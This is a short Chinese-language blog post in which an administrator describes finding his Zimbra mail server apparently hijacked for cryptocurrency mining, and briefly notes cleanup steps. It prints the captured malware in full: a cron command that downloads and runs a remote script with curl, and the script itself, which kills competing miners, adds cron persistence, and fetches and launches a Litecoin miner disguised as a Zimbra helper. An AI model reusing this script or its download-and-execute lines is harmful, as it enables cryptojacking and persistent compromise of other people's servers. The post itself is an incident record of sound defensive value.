My cool new Blog

Hello World! This is the most epic subtitle ever.
en de

[筆記] Zimbra 主機疑似被拿來挖礦了

2014-08-08 工作筆記

最近發現Zimbra主機似乎被駭客打進去了

會有 root 往外發信的紀錄,所以在 zimbra的postfix裡面設定了 always_bcc ,想看一下到底是寄出什麼東西

似乎是透過crontab 定時送出,可是我/etc底下的 crontab 都檢查過了,沒看到異常說..

信件內容如下 >

> > > > > > > > > > > > > > > > > > > > > > > >
> > > > > > > > > > > > > >
> > > ### Cron Daemon <root@> > >
> > 		> >
3:00 (5 小時前) > >
> >
> > > > > > > > > > > > > >
> >
寄給 zimbra
> >
> >
> >
> >
> >
> > /bin/sh: -c: line 0: syntax error near unexpected token (' > > /bin/sh: -c: line 0:/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh’ > > >   > > >    

會自己去抓檔案下來,偽裝成  zimbra 的系統檔案,不過那個檔案連結似乎已經失效,抓不到了。

抓下來的檔案內容如下 > #!/bin/bash > > kill -9 $(ps aux | grep “-B -o stratum” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “minerd” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “-B -c /” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “stratum” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “java” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “ssh-scan” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “/bin/sh ./start” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “zimbravm-cache” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “/bin/bash ./a” | awk ‘{print $2}’) 2>&1 > > kill -9 $(ps aux | grep “pscan” | awk ‘{print $2}’) 2>&1 > > > ARCH=$(uname -m) > > BINNAME=“zm-helper” > > BINCFG=“zm-helper.cfg” > > > if [[ $EUID -eq 0 ]] > > then > > BINDIR=“/sbin/” > > CFGDIR=“/etc/” > > BINPATH=“$BINDIR$BINNAME” > > CFGPATH=“$CFGDIR$BINCFG” > > fi > > if [[ $EUID -ne 0 ]] > > then > > BINDIR=“/tmp/” > > CFGDIR=“/tmp/” > > BINPATH=“$BINDIR$BINNAME” > > CFGPATH=“$CFGDIR$BINCFG” > > fi > > if [ -f /opt/zimbra/data/tmp/.z.sh ] > > then > > crontab -r > > wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT -O /opt/zimbra/data/tmp/.z.sh > > cro=‘/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh’ > > (crontab -l; echo “0 */3 * * * $cro”) 2>&1 | sed “s/no crontab for $(whoami)//” | uniq | crontab - > > fi > > k=$(ps aux | grep “[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}” | awk ‘{print $2}’) > > if [ ! -z “$k” ] > > then > > kill -9 $(ps aux | grep “[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}” | awk ‘{print $2}’) > > fi > > [[ -f “$CFGPATH” ]] && rm -rf “$CFGPATH” > > [[ -f “$BINPATH” ]] && rm -rf “$BINPATH” > > (cat <<- EOF > > { > > “url” : “stratum+tcp://ltc.give-me-coins.com:3333”, > > “user” : “n0ts0me1ne.1”, > > “pass” : “zx1”, > > “quiet” : true > > } > > EOF > > ) > “$CFGPATH” > > wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/m_`uname -m` -O “$BINPATH” > > chmod +x “$BINPATH” > > eval “$BINPATH -B -c $CFGPATH 2> /dev/null” > > > chk=$(ps aux | grep “[${BINNAME:0:1}]mod” | awk ‘{print $2}’) > > if [ ! -z “$chk” ] > > then > > echo “$chk” > > fi > > exit 1 先把類似的檔案備份、砍掉,執行 > /opt/zimbra/libexec/zmfixperms –verbose –extended 修正權限問題

大概就先這樣子吧,改天再來重裝好了。

 

 

give-me-coins zimbra
comments powered by Disqus
© 2017 by Lednerb
Bilberry Hugo Theme